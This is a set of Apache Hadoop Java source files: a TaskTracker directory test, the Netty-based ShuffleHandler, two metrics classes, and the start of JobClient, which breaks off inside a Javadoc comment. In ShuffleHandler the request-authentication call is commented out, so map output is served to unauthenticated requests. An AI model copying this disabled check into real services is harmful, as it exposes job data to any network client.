import org.apache.hadoop.fs.LocalFileSystem;
import org.apache.hadoop.mapred.TaskTracker.LocalStorage;
import org.junit.Test;
import org.junit.Before;
import org.mockito.Mockito;
/**
* Tests for the correct behavior of the TaskTracker starting up with
* respect to its local-disk directories.
*/
public class TestTaskTrackerDirectories {
private final String TEST_DIR = new File("build/test/testmapredlocaldir")
.getAbsolutePath();
@Before
public void deleteTestDir() throws IOException {
FileUtil.fullyDelete(new File(TEST_DIR));
assertFalse("Could not delete " + TEST_DIR,
new File(TEST_DIR).exists());
}
@Test
public void testCreatesLocalDirs() throws Exception {
Configuration conf = new Configuration();
String[] dirs = new String[] {
TEST_DIR + "/local1",
TEST_DIR + "/local2"
};
conf.setStrings("mapred.local.dir", dirs);
setupTaskTracker(conf);
for (String dir : dirs) {
checkDir(dir);
}
}
@Test
public void testFixesLocalDirPermissions() throws Exception {
Configuration conf = new Configuration();
String[] dirs = new String[] {
TEST_DIR + "/badperms"
};
new File(dirs[0]).mkdirs();
FileUtil.chmod(dirs[0], "000");
conf.setStrings("mapred.local.dir", dirs);
setupTaskTracker(conf);
for (String dir : dirs) {
checkDir(dir);
}
}
@Test
public void testCreatesLogDirs() throws Exception {
String[] dirs = new String[] {
TEST_DIR + "/local1",
TEST_DIR + "/local2"
};
Path logDir1 = new Path(dirs[0], TaskLog.USERLOGS_DIR_NAME);
Path logDir2 = new Path(dirs[1], TaskLog.USERLOGS_DIR_NAME);
FileUtil.fullyDelete(new File(logDir1.toString()));
FileUtil.fullyDelete(new File(logDir2.toString()));
Configuration conf = new Configuration();
conf.setStrings("mapred.local.dir", dirs);
setupTaskTracker(conf);
checkDir(logDir1.toString());
checkDir(logDir2.toString());
}
@Test
public void testFixesLogDirPermissions() throws Exception {
String[] dirs = new String[] {
TEST_DIR + "/local1"
};
File dir = new File(dirs[0]);
FileUtil.fullyDelete(dir);
dir.mkdirs();
FileUtil.chmod(dir.getAbsolutePath(), "000");
Configuration conf = new Configuration();
conf.setStrings("mapred.local.dir", dirs);
setupTaskTracker(conf);
checkDir(dir.getAbsolutePath());
}
private void setupTaskTracker(Configuration conf) throws Exception {
JobConf ttConf = new JobConf(conf);
// Doesn't matter what we give here - we won't actually
// connect to it.
TaskTracker tt = new TaskTracker();
tt.setConf(ttConf);
tt.setTaskController(Mockito.mock(TaskController.class));
LocalDirAllocator localDirAllocator =
new LocalDirAllocator("mapred.local.dir");
tt.setLocalDirAllocator(localDirAllocator);
LocalFileSystem localFs = FileSystem.getLocal(conf);
LocalStorage localStorage = new LocalStorage(ttConf.getLocalDirs());
localStorage.checkDirs(localFs, true);
tt.setLocalStorage(localStorage);
tt.setLocalFileSystem(localFs);
tt.initializeDirectories();
}
private void checkDir(String dir) throws IOException {
FileSystem fs = RawLocalFileSystem.get(new Configuration());
File f = new File(dir);
assertTrue(dir + " should exist", f.exists());
FileStatus stat = fs.getFileStatus(new Path(dir));
assertEquals(dir + " has correct permissions",
0755, stat.getPermission().toShort());
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/ShuffleHandler.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import static org.jboss.netty.buffer.ChannelBuffers.wrappedBuffer;
import static org.jboss.netty.handler.codec.http.HttpHeaders.Names.CONTENT_TYPE;
import static org.jboss.netty.handler.codec.http.HttpMethod.GET;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.BAD_REQUEST;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.FORBIDDEN;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.INTERNAL_SERVER_ERROR;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.METHOD_NOT_ALLOWED;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.NOT_FOUND;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.OK;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.UNAUTHORIZED;
import static org.jboss.netty.handler.codec.http.HttpVersion.HTTP_1_1;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.RandomAccessFile;
import java.net.InetSocketAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.concurrent.Executors;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;
import javax.crypto.SecretKey;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.DataOutputBuffer;
import org.apache.hadoop.mapred.task.reduce.ShuffleHeader;
import org.apache.hadoop.mapreduce.security.SecureShuffleUtils;
import org.apache.hadoop.mapreduce.security.token.JobTokenIdentifier;
import org.apache.hadoop.security.token.Token;
import org.jboss.netty.bootstrap.ServerBootstrap;
import org.jboss.netty.buffer.ChannelBuffers;
import org.jboss.netty.channel.Channel;
import org.jboss.netty.channel.ChannelFactory;
import org.jboss.netty.channel.ChannelFuture;
import org.jboss.netty.channel.ChannelFutureListener;
import org.jboss.netty.channel.ChannelHandlerContext;
import org.jboss.netty.channel.ChannelPipeline;
import org.jboss.netty.channel.ChannelPipelineFactory;
import org.jboss.netty.channel.Channels;
import org.jboss.netty.channel.DefaultFileRegion;
import org.jboss.netty.channel.ExceptionEvent;
import org.jboss.netty.channel.FileRegion;
import org.jboss.netty.channel.MessageEvent;
import org.jboss.netty.channel.SimpleChannelUpstreamHandler;
import org.jboss.netty.channel.group.ChannelGroup;
import org.jboss.netty.channel.group.DefaultChannelGroup;
import org.jboss.netty.channel.socket.nio.NioServerSocketChannelFactory;
import org.jboss.netty.handler.codec.frame.TooLongFrameException;
import org.jboss.netty.handler.codec.http.DefaultHttpResponse;
import org.jboss.netty.handler.codec.http.HttpChunkAggregator;
import org.jboss.netty.handler.codec.http.HttpRequest;
import org.jboss.netty.handler.codec.http.HttpRequestDecoder;
import org.jboss.netty.handler.codec.http.HttpResponse;
import org.jboss.netty.handler.codec.http.HttpResponseEncoder;
import org.jboss.netty.handler.codec.http.HttpResponseStatus;
import org.jboss.netty.handler.codec.http.QueryStringDecoder;
import org.jboss.netty.handler.stream.ChunkedWriteHandler;
import org.jboss.netty.util.CharsetUtil;
import com.google.common.util.concurrent.ThreadFactoryBuilder;
public class ShuffleHandler {
private static final Log LOG = LogFactory.getLog(ShuffleHandler.class);
private int port;
private ChannelFactory selector;
private final ChannelGroup accepted = new DefaultChannelGroup();
public static final String MAPREDUCE_SHUFFLE_SERVICEID = "mapreduce.shuffle";
public static final String SHUFFLE_PORT_CONFIG_KEY = "mapreduce.shuffle.port";
public static final int DEFAULT_SHUFFLE_PORT = 8080;
public final Configuration conf;
public final TaskTracker tt;
public ShuffleHandler(TaskTracker tt, Configuration conf) {
this.tt = tt;
this.conf = conf;
}
/**
* Serialize the shuffle port into a ByteBuffer for use later on.
*
* @param port
* the port to be sent to the ApplicationMaster
* @return the serialized form of the port.
*/
static ByteBuffer serializeMetaData(int port) throws IOException {
// TODO these bytes should be versioned
DataOutputBuffer port_dob = new DataOutputBuffer();
port_dob.writeInt(port);
return ByteBuffer.wrap(port_dob.getData(), 0, port_dob.getLength());
}
/**
* A helper function to deserialize the metadata returned by ShuffleHandler.
*
* @param meta
* the metadata returned by the ShuffleHandler
* @return the port the Shuffle Handler is listening on to serve shuffle data.
*/
public static int deserializeMetaData(ByteBuffer meta) throws IOException {
// TODO this should be returning a class not just an int
DataInputByteBuffer in = new DataInputByteBuffer();
in.reset(meta);
int port = in.readInt();
return port;
}
/**
* A helper function to serialize the JobTokenIdentifier to be sent to the
* ShuffleHandler as ServiceData.
*
* @param jobToken
* the job token to be used for authentication of shuffle data
* requests.
* @return the serialized version of the jobToken.
*/
public static ByteBuffer serializeServiceData(
Token<JobTokenIdentifier> jobToken) throws IOException {
// TODO these bytes should be versioned
DataOutputBuffer jobToken_dob = new DataOutputBuffer();
jobToken.write(jobToken_dob);
return ByteBuffer
.wrap(jobToken_dob.getData(), 0, jobToken_dob.getLength());
}
static Token<JobTokenIdentifier> deserializeServiceData(ByteBuffer secret)
throws IOException {
DataInputByteBuffer in = new DataInputByteBuffer();
in.reset(secret);
Token<JobTokenIdentifier> jt = new Token<JobTokenIdentifier>();
jt.readFields(in);
return jt;
}
private synchronized void init() {
ThreadFactory bossFactory = new ThreadFactoryBuilder().setNameFormat(
"ShuffleHandler Netty Boss #%d").build();
ThreadFactory workerFactory = new ThreadFactoryBuilder().setNameFormat(
"ShuffleHandler Netty Worker #%d").build();
selector = new NioServerSocketChannelFactory(Executors
.newCachedThreadPool(bossFactory), Executors
.newCachedThreadPool(workerFactory), conf.getInt(
"mapreduce.netty.shuffle.server.handler.count", 2 * Runtime
.getRuntime().availableProcessors()));
}
// TODO change AbstractService to throw InterruptedException
public synchronized void start() {
init();
ServerBootstrap bootstrap = new ServerBootstrap(selector);
HttpPipelineFactory pipelineFact = new HttpPipelineFactory(conf);
bootstrap.setPipelineFactory(pipelineFact);
this.port = conf.getInt(SHUFFLE_PORT_CONFIG_KEY, DEFAULT_SHUFFLE_PORT);
Channel ch = bootstrap.bind(new InetSocketAddress(port));
accepted.add(ch);
int actualPort = ((InetSocketAddress) ch.getLocalAddress()).getPort();
if (port != actualPort) {
throw new RuntimeException("Shuffle Server Port " + port
+ " has already be in use");
}
conf.set(SHUFFLE_PORT_CONFIG_KEY, Integer.toString(port));
pipelineFact.SHUFFLE.setPort(port);
LOG.info("Netty shuffle server " + " listening on port " + port);
}
public int getPort() {
return port;
}
public synchronized void stop() {
accepted.close().awaitUninterruptibly(10, TimeUnit.SECONDS);
ServerBootstrap bootstrap = new ServerBootstrap(selector);
bootstrap.releaseExternalResources();
}
public synchronized ByteBuffer getMeta() {
try {
return serializeMetaData(port);
} catch (IOException e) {
LOG.error("Error during getMeta", e);
// TODO add API to AuxiliaryServices to report failures
return null;
}
}
class HttpPipelineFactory implements ChannelPipelineFactory {
final Shuffle SHUFFLE;
public HttpPipelineFactory(Configuration conf) {
SHUFFLE = new Shuffle(conf);
}
@Override
public ChannelPipeline getPipeline() throws Exception {
return Channels.pipeline(new HttpRequestDecoder(),
new HttpChunkAggregator(1 << 16), new HttpResponseEncoder(),
new ChunkedWriteHandler(), SHUFFLE);
}
}
class Shuffle extends SimpleChannelUpstreamHandler {
private final Configuration conf;
private final IndexCache indexCache;
private final LocalDirAllocator lDirAlloc = new LocalDirAllocator(
"mapred.local.dir");
private int port;
public Shuffle(Configuration conf) {
this.conf = conf;
indexCache = new IndexCache(new JobConf(conf));
this.port = conf.getInt(SHUFFLE_PORT_CONFIG_KEY, DEFAULT_SHUFFLE_PORT);
}
public void setPort(int port) {
this.port = port;
}
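// A single "map" query parameter may carry several comma-separated map ids; flatten all values into one list.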
private List<String> splitMaps(List<String> mapq) {
if (null == mapq) {
return null;
}
final List<String> ret = new ArrayList<String>();
for (String s : mapq) {
Collections.addAll(ret, s.split(","));
}
return ret;
}
@Override
public void messageReceived(ChannelHandlerContext ctx, MessageEvent evt)
throws Exception {
HttpRequest request = (HttpRequest) evt.getMessage();
if (request.getMethod() != GET) {
sendError(ctx, METHOD_NOT_ALLOWED);
return;
}
final Map<String, List<String>> q = new QueryStringDecoder(request
.getUri()).getParameters();
final List<String> mapIds = splitMaps(q.get("map"));
final List<String> reduceQ = q.get("reduce");
final List<String> jobQ = q.get("job");
if (LOG.isDebugEnabled()) {
LOG.debug("RECV: " + request.getUri() + "\n mapId: " + mapIds
+ "\n reduceId: " + reduceQ + "\n jobId: " + jobQ);
}
if (mapIds == null || reduceQ == null || jobQ == null) {
sendError(ctx, "Required param job, map and reduce", BAD_REQUEST);
return;
}
if (reduceQ.size() != 1 || jobQ.size() != 1) {
sendError(ctx, "Too many job/reduce parameters", BAD_REQUEST);
return;
}
int reduceId;
String jobId;
try {
reduceId = Integer.parseInt(reduceQ.get(0));
jobId = jobQ.get(0);
} catch (NumberFormatException e) {
sendError(ctx, "Bad reduce parameter", BAD_REQUEST);
return;
} catch (IllegalArgumentException e) {
sendError(ctx, "Bad job parameter", BAD_REQUEST);
return;
}
final String reqUri = request.getUri();
if (null == reqUri) {
// TODO? add upstream?
sendError(ctx, FORBIDDEN);
return;
}
HttpResponse response = new DefaultHttpResponse(HTTP_1_1, OK);
// try {
// verifyRequest(jobId, ctx, request, response, new URL("http", "",
// this.port, reqUri));
// } catch (IOException e) {
// LOG.warn("Shuffle failure ", e);
// sendError(ctx, e.getMessage(), UNAUTHORIZED);
// return;
// }
Channel ch = evt.getChannel();
ch.write(response);
// TODO refactor the following into the pipeline
ChannelFuture lastMap = null;
for (String mapId : mapIds) {
try {
lastMap = sendMapOutput(ctx, ch, tt.getRunAsUserName(jobId), jobId,
mapId, reduceId);
if (null == lastMap) {
sendError(ctx, NOT_FOUND);
return;
}
} catch (IOException e) {
LOG.error("Shuffle error ", e);
sendError(ctx, e.getMessage(), INTERNAL_SERVER_ERROR);
return;
}
}
lastMap.addListener(ChannelFutureListener.CLOSE);
}
private void verifyRequest(
String jobId,
ChannelHandlerContext ctx,
HttpRequest request,
HttpResponse response,
URL requestUri) throws IOException {
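      // The fetcher sends a hash of the request URL computed with the job
      // token secret; we verify it and answer with a hash of that hash in the
      // reply header so the fetcher can authenticate this server in turn.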
SecretKey tokenSecret = tt.getJobTokenSecretManager()
.retrieveTokenSecret(jobId);
if (null == tokenSecret) {
LOG.info("Request for unknown token " + jobId);
throw new IOException("could not find jobid");
}
// string to encrypt
String enc_str = SecureShuffleUtils.buildMsgFrom(requestUri);
// hash from the fetcher
String urlHashStr = request
.getHeader(SecureShuffleUtils.HTTP_HEADER_URL_HASH);
if (urlHashStr == null) {
LOG.info("Missing header hash for " + jobId);
throw new IOException("fetcher cannot be authenticated");
}
if (LOG.isDebugEnabled()) {
int len = urlHashStr.length();
LOG.debug("verifying request. enc_str=" + enc_str + "; hash=..."
+ urlHashStr.substring(len - len / 2, len - 1));
}
// verify - throws exception
SecureShuffleUtils.verifyReply(urlHashStr, enc_str, tokenSecret);
// verification passed - encode the reply
String reply = SecureShuffleUtils.generateHash(urlHashStr.getBytes(),
tokenSecret);
response.setHeader(SecureShuffleUtils.HTTP_HEADER_REPLY_URL_HASH, reply);
if (LOG.isDebugEnabled()) {
int len = reply.length();
LOG.debug("Fetcher request verfied. enc_str=" + enc_str + ";reply="
+ reply.substring(len - len / 2, len - 1));
}
}
protected ChannelFuture sendMapOutput(
ChannelHandlerContext ctx,
Channel ch,
String user,
String jobId,
String mapId,
int reduce) throws IOException {
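      // For one map output the response body is a ShuffleHeader (map id,
      // partition length, raw length, reduce id) followed by the matching
      // byte range of the map's spill file, sent as a FileRegion
      // (zero-copy where the transport supports it).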
Path indexFileName = tt.getIndexFile(jobId, mapId);
Path mapOutputFileName = tt.getMapOutputFile(jobId, mapId);
IndexRecord info = indexCache.getIndexInformation(mapId, reduce,
indexFileName, user);
final ShuffleHeader header = new ShuffleHeader(mapId, info.partLength,
info.rawLength, reduce);
final DataOutputBuffer dob = new DataOutputBuffer();
header.write(dob);
ch.write(wrappedBuffer(dob.getData(), 0, dob.getLength()));
File spillfile = new File(mapOutputFileName.toString());
RandomAccessFile spill;
try {
spill = new RandomAccessFile(spillfile, "r");
} catch (FileNotFoundException e) {
LOG.info(spillfile + " not found");
return null;
}
final FileRegion partition = new DefaultFileRegion(spill.getChannel(),
info.startOffset, info.partLength);
ChannelFuture writeFuture = ch.write(partition);
writeFuture.addListener(new ChannelFutureListener() {
// TODO error handling; distinguish IO/connection failures,
// attribute to appropriate spill output
@Override
public void operationComplete(ChannelFuture future) {
partition.releaseExternalResources();
}
});
return writeFuture;
}
private void sendError(ChannelHandlerContext ctx, HttpResponseStatus status) {
sendError(ctx, "", status);
}
private void sendError(
ChannelHandlerContext ctx,
String message,
HttpResponseStatus status) {
HttpResponse response = new DefaultHttpResponse(HTTP_1_1, status);
response.setHeader(CONTENT_TYPE, "text/plain; charset=UTF-8");
response.setContent(ChannelBuffers.copiedBuffer(message,
CharsetUtil.UTF_8));
// Close the connection as soon as the error message is sent.
ctx.getChannel().write(response)
.addListener(ChannelFutureListener.CLOSE);
}
@Override
public void exceptionCaught(ChannelHandlerContext ctx, ExceptionEvent e)
throws Exception {
Channel ch = e.getChannel();
Throwable cause = e.getCause();
if (cause instanceof TooLongFrameException) {
sendError(ctx, BAD_REQUEST);
return;
}
LOG.error("Shuffle error: ", cause);
if (ch.isConnected()) {
LOG.error("Shuffle error " + e);
sendError(ctx, INTERNAL_SERVER_ERROR);
}
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/task/reduce/ShuffleClientMetrics.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred.task.reduce;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapreduce.TaskAttemptID;
import org.apache.hadoop.metrics.MetricsContext;
import org.apache.hadoop.metrics.MetricsRecord;
import org.apache.hadoop.metrics.MetricsUtil;
import org.apache.hadoop.metrics.Updater;
class ShuffleClientMetrics implements Updater
{
private MetricsRecord shuffleMetrics = null;
private int numFailedFetches = 0;
private int numSuccessFetches = 0;
private long numBytes = 0;
private int numThreadsBusy = 0;
private final int numCopiers;
ShuffleClientMetrics(TaskAttemptID reduceId, JobConf jobConf)
{
this.numCopiers = jobConf.getInt("mapred.reduce.parallel.copies", 5);
MetricsContext metricsContext = MetricsUtil.getContext("mapred");
this.shuffleMetrics = MetricsUtil.createRecord(metricsContext, "shuffleInput");
this.shuffleMetrics.setTag("user", jobConf.getUser());
this.shuffleMetrics.setTag("jobName", jobConf.getJobName());
this.shuffleMetrics.setTag("jobId", reduceId.getJobID().toString());
this.shuffleMetrics.setTag("taskId", reduceId.toString());
this.shuffleMetrics.setTag("sessionId", jobConf.getSessionId());
metricsContext.registerUpdater(this);
}
public synchronized void inputBytes(long numBytes)
{
this.numBytes += numBytes;
}
public synchronized void failedFetch()
{
++numFailedFetches;
}
public synchronized void successFetch()
{
++numSuccessFetches;
}
public synchronized void threadBusy()
{
++numThreadsBusy;
}
public synchronized void threadFree()
{
--numThreadsBusy;
}
public void doUpdates(MetricsContext unused)
{
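        // Push the counters accumulated since the last update, then reset
        // them so each reporting period publishes only new activity.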
synchronized (this)
{
shuffleMetrics.incrMetric("shuffle_input_bytes", numBytes);
shuffleMetrics.incrMetric("shuffle_failed_fetches", numFailedFetches);
shuffleMetrics.incrMetric("shuffle_success_fetches", numSuccessFetches);
if (numCopiers != 0)
{
shuffleMetrics.setMetric("shuffle_fetchers_busy_percent",
100 * ((float) numThreadsBusy / numCopiers));
}
else
{
shuffleMetrics.setMetric("shuffle_fetchers_busy_percent", 0);
}
numBytes = 0;
numSuccessFetches = 0;
numFailedFetches = 0;
}
shuffleMetrics.update();
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/server/datanode/metrics/DataNodeMetrics.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.datanode.metrics;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.metrics.MetricsContext;
import org.apache.hadoop.metrics.MetricsRecord;
import org.apache.hadoop.metrics.MetricsUtil;
import org.apache.hadoop.metrics.Updater;
import org.apache.hadoop.metrics.jvm.JvmMetrics;
import org.apache.hadoop.metrics.util.MetricsBase;
import org.apache.hadoop.metrics.util.MetricsRegistry;
import org.apache.hadoop.metrics.util.MetricsTimeVaryingInt;
import org.apache.hadoop.metrics.util.MetricsTimeVaryingLong;
import org.apache.hadoop.metrics.util.MetricsTimeVaryingRate;
/**
*
* This class is for maintaining the various DataNode statistics
* and publishing them through the metrics interfaces.
* This also registers the JMX MBean for RPC.
* <p>
* This class has a number of metrics variables that are publicly accessible;
* these variables (objects) have methods to update their values;
* for example:
* <p> {@link #blocksRead}.inc()
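 *  <p>A timed operation is recorded similarly; for instance (an illustrative
 *  sketch, assuming the caller measured <code>elapsedMillis</code> itself):
 *  <p> {@link #readBlockOp}.inc(elapsedMillis)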
*
*/
public class DataNodeMetrics implements Updater {
private final MetricsRecord metricsRecord;
private DataNodeActivityMBean datanodeActivityMBean;
public MetricsRegistry registry = new MetricsRegistry();
public MetricsTimeVaryingLong bytesWritten =
new MetricsTimeVaryingLong("bytes_written", registry);
public MetricsTimeVaryingLong bytesRead =
new MetricsTimeVaryingLong("bytes_read", registry);
public MetricsTimeVaryingInt blocksWritten =
new MetricsTimeVaryingInt("blocks_written", registry);
public MetricsTimeVaryingInt blocksRead =
new MetricsTimeVaryingInt("blocks_read", registry);
public MetricsTimeVaryingInt blocksReplicated =
new MetricsTimeVaryingInt("blocks_replicated", registry);
public MetricsTimeVaryingInt blocksRemoved =
new MetricsTimeVaryingInt("blocks_removed", registry);
public MetricsTimeVaryingInt blocksVerified =
new MetricsTimeVaryingInt("blocks_verified", registry);
public MetricsTimeVaryingInt blockVerificationFailures =
new MetricsTimeVaryingInt("block_verification_failures", registry);
public MetricsTimeVaryingInt readsFromLocalClient =
new MetricsTimeVaryingInt("reads_from_local_client", registry);
public MetricsTimeVaryingInt readsFromRemoteClient =
new MetricsTimeVaryingInt("reads_from_remote_client", registry);
public MetricsTimeVaryingInt writesFromLocalClient =
new MetricsTimeVaryingInt("writes_from_local_client", registry);
public MetricsTimeVaryingInt writesFromRemoteClient =
new MetricsTimeVaryingInt("writes_from_remote_client", registry);
public MetricsTimeVaryingInt volumeFailures =
new MetricsTimeVaryingInt("volumeFailures", registry);
public MetricsTimeVaryingRate readBlockOp =
new MetricsTimeVaryingRate("readBlockOp", registry);
public MetricsTimeVaryingRate writeBlockOp =
new MetricsTimeVaryingRate("writeBlockOp", registry);
public MetricsTimeVaryingRate blockChecksumOp =
new MetricsTimeVaryingRate("blockChecksumOp", registry);
public MetricsTimeVaryingRate copyBlockOp =
new MetricsTimeVaryingRate("copyBlockOp", registry);
public MetricsTimeVaryingRate replaceBlockOp =
new MetricsTimeVaryingRate("replaceBlockOp", registry);
public MetricsTimeVaryingRate heartbeats =
new MetricsTimeVaryingRate("heartBeats", registry);
public MetricsTimeVaryingRate blockReports =
new MetricsTimeVaryingRate("blockReports", registry);
public DataNodeMetrics(Configuration conf, String datanodeName) {
String sessionId = conf.get("session.id");
// Initiate reporting of Java VM metrics
JvmMetrics.init("DataNode", sessionId);
// Now the MBean for the data node
datanodeActivityMBean = new DataNodeActivityMBean(registry, datanodeName);
// Create record for DataNode metrics
MetricsContext context = MetricsUtil.getContext("dfs");
metricsRecord = MetricsUtil.createRecord(context, "datanode");
metricsRecord.setTag("sessionId", sessionId);
context.registerUpdater(this);
}
public void shutdown() {
if (datanodeActivityMBean != null)
datanodeActivityMBean.shutdown();
}
/**
* Since this object is a registered updater, this method will be called
* periodically, e.g. every 5 seconds.
*/
public void doUpdates(MetricsContext unused) {
synchronized (this) {
for (MetricsBase m : registry.getMetricsList()) {
m.pushMetric(metricsRecord);
}
}
metricsRecord.update();
}
public void resetAllMinMax() {
readBlockOp.resetMinMax();
writeBlockOp.resetMinMax();
blockChecksumOp.resetMinMax();
copyBlockOp.resetMinMax();
replaceBlockOp.resetMinMax();
heartbeats.resetMinMax();
blockReports.resetMinMax();
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/JobClient.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.net.URLConnection;
import java.net.UnknownHostException;
import java.util.Arrays;
import java.util.Collection;
import java.util.Comparator;
import java.util.List;
import java.util.Map;
import java.security.PrivilegedExceptionAction;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.conf.Configured;
import org.apache.hadoop.filecache.DistributedCache;
import org.apache.hadoop.filecache.TrackerDistributedCacheManager;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.mapreduce.security.token.delegation.DelegationTokenIdentifier;
import org.apache.hadoop.hdfs.DFSClient;
import org.apache.hadoop.io.IOUtils;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.ipc.RPC;
import org.apache.hadoop.ipc.RemoteException;
import org.apache.hadoop.mapred.Counters.Counter;
import org.apache.hadoop.mapred.Counters.Group;
import org.apache.hadoop.mapred.QueueManager.QueueACL;
import org.apache.hadoop.mapreduce.InputFormat;
import org.apache.hadoop.mapreduce.InputSplit;
import org.apache.hadoop.mapreduce.JobContext;
import org.apache.hadoop.mapreduce.JobSubmissionFiles;
import org.apache.hadoop.mapreduce.security.TokenCache;
import org.apache.hadoop.mapreduce.split.JobSplitWriter;
import org.apache.hadoop.net.NetUtils;
import org.apache.hadoop.security.AccessControlException;
import org.apache.hadoop.security.Credentials;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.security.authorize.AccessControlList;
import org.apache.hadoop.security.token.Token;
import org.apache.hadoop.security.token.SecretManager.InvalidToken;
import org.apache.hadoop.util.ReflectionUtils;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.util.Tool;
import org.apache.hadoop.util.ToolRunner;
import org.codehaus.jackson.JsonParseException;
import org.codehaus.jackson.map.JsonMappingException;
import org.codehaus.jackson.map.ObjectMapper;
/**
* <code>JobClient</code> is the primary interface for the user-job to interact
* with the {@link JobTracker}.
*
* <code>JobClient</code> provides facilities to submit jobs, track their
* progress, access component-tasks' reports/logs, get the Map-Reduce cluster
* status information etc.
*
* <p>The job submission process involves:
* <ol>
* <li>
* Checking the input and output specifications of the job.
* </li>
* <li>
* Computing the {@link InputSplit}s for the job.
* </li>
* <li>
* Setup the requisite accounting information for the {@link DistributedCache}
* of the job, if necessary.
* </li>
* <li>
* Copying the job's jar and configuration to the map-reduce system directory
* on the distributed file-system.
* </li>
* <li>
* Submitting the job to the <code>JobTracker</code> and optionally monitoring
 * its status.
* </li>
* </ol></p>
*
* Normally the user creates the application, describes various facets of the
* job via {@link JobConf} and then uses the <code>JobClient</code> to submit
* the job and monitor its progress.
*
* <p>Here is an example on how to use <code>JobClient</code>:</p>
* <p><blockquote><pre>
* // Create a new JobConf
* JobConf job = new JobConf(new Configuration(), MyJob.class);
*
* // Specify various job-specific parameters
* job.setJobName("myjob");
*
* job.setInputPath(new Path("in"));
* job.setOutputPath(new Path("out"));
*
* job.setMapperClass(MyJob.MyMapper.class);
* job.setReducerClass(MyJob.MyReducer.class);
*
* // Submit the job, then poll for progress until the job is complete
* JobClient.runJob(job);
* </pre></blockquote></p>
*
* <h4 id="JobControl">Job Control</h4>
*
* <p>At times clients would chain map-reduce jobs to accomplish complex tasks
* which cannot be done via a single map-reduce job. This is fairly easy since
* the output of the job, typically, goes to distributed file-system and that
* can be used as the input for the next job.</p>
*
 * <p>However, this also means that the onus of ensuring jobs are complete
* (success/failure) lies squarely on the clients. In such situations the
* various job-control options are:
* <ol>
* <li>
* {@link #runJob(JobConf)} : submits the job and returns only after
* the job has completed.
* </li>
* <li>
 *   {@link #submitJob(JobConf)} : only submits the job, then polls the
 *   returned handle to the {@link RunningJob} to query status and make
 *   scheduling decisions (see the sketch below).
* </li>
